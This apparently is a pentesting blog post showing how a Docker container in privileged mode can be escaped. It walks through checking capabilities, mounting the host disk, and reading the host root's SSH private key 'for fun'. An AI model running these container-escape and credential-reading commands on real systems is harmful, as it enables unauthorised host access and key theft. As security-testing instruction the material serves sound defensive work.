Docker Privileged Mode for Privilege Escalation

Hi Pentester,

Today virtualization with docker is getting interesting for most of the developer to race on making their application compatible to run within docker. I like to discuss a simple configuration that oftenly forgoten on deploying docker in the privileged mode that can be abused to escape the container to get the host in full access

privileged: true
What is Docker privileged mode

When the user in the container have access to the root then they can mount the host file system into the docker file system

You can run this command within the container to check if you are running privilege mode

$ ip link add dummy0 type dummy

If this command runs successfully, you can conclude that the container has the NET_ADMIN capability. NET_ADMIN is part of the privileged capabilities set, and containers that don’t have it are not privileged. You can clean up the dummy0 link after this test by running this command

ip link delete dummy0

To escape from the container, we need to run lsblk to know lists information about all available or the specified block devices.

now we can try to mount the sda2 which probably allow us to mount the host filesystem

mount /dev/sda2 /mnt -o loop6

and now lets check the /mnt. We successfully mount the host filesystem to the docker with root privilege

ls /mnt/
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var

We can now have full access to the host file system. We can steal the rsa_id from the host for fun

cat /mnt/root/.ssh/id_rsa

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s